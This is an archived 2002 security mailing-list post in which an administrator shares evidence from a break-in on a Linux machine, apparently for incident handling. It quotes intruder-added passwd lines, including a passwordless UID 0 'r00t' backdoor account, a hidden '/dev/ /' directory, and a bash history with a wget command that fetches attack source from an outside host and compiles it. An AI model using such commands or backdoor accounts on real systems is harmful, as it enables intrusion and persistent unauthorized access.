watching them -after the fact

From: Alvin Oga (alvin.secat_private-Consulting.com)
Date: Sun Mar 24 2002 - 23:11:37 PST

Next message: Olaf Schreck: "fun with posiden rootkit"

Previous message: Rohrer, Mark E: "RE: Logon Banners"
Next in thread: zeno: "Re: watching them -after the fact"
Reply: zeno: "Re: watching them -after the fact"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

hi ya

this machine does NOT have su, wget, gcc installed
so they couldn't do much ???

they also created an empty dir:  "/dev/ /"
        ( yes... a space as its filename )

c ya
alvin


cat /etc/passwd
        ...

-->>        karlin::1001:1001::/tmp:/bin/bash
-->>        r00t::0:0::/tmp:/bin/bash


cat /tmp/.bash_history
...
su r00t
su r00t
sudo
suidperl 
uname -a
w
uname -a
exit
su r00t
uname -a
w
exit
w
su r00t
exit
w
su r00t
exit
wget turma85.hypermart.net/slice.c
gcc -o sl slice.c 
exit
su r00t
w
exit
#
# end of history


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Olaf Schreck: "fun with posiden rootkit"
Previous message: Rohrer, Mark E: "RE: Logon Banners"
Next in thread: zeno: "Re: watching them -after the fact"
Reply: zeno: "Re: watching them -after the fact"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Mar 25 2002 - 11:35:33 PST